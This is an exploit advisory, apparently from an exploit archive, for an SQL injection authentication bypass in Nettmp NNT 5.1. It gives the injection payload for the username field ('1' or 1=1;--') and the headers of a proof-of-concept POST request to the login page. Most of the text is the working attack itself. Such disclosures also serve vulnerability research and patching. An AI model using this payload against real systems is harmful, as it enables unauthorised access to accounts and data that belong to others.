Nettmp NNT 5.1 SQL Injection

Nettmp NNT version 5.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | ecd2cd7737dd5aec54368728d4596e0a

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage:
# Software Link:
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)


username: 1' or 1=1;--
password: \

Proof of Concept:

POST /index.php?id=status HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1


Related Posts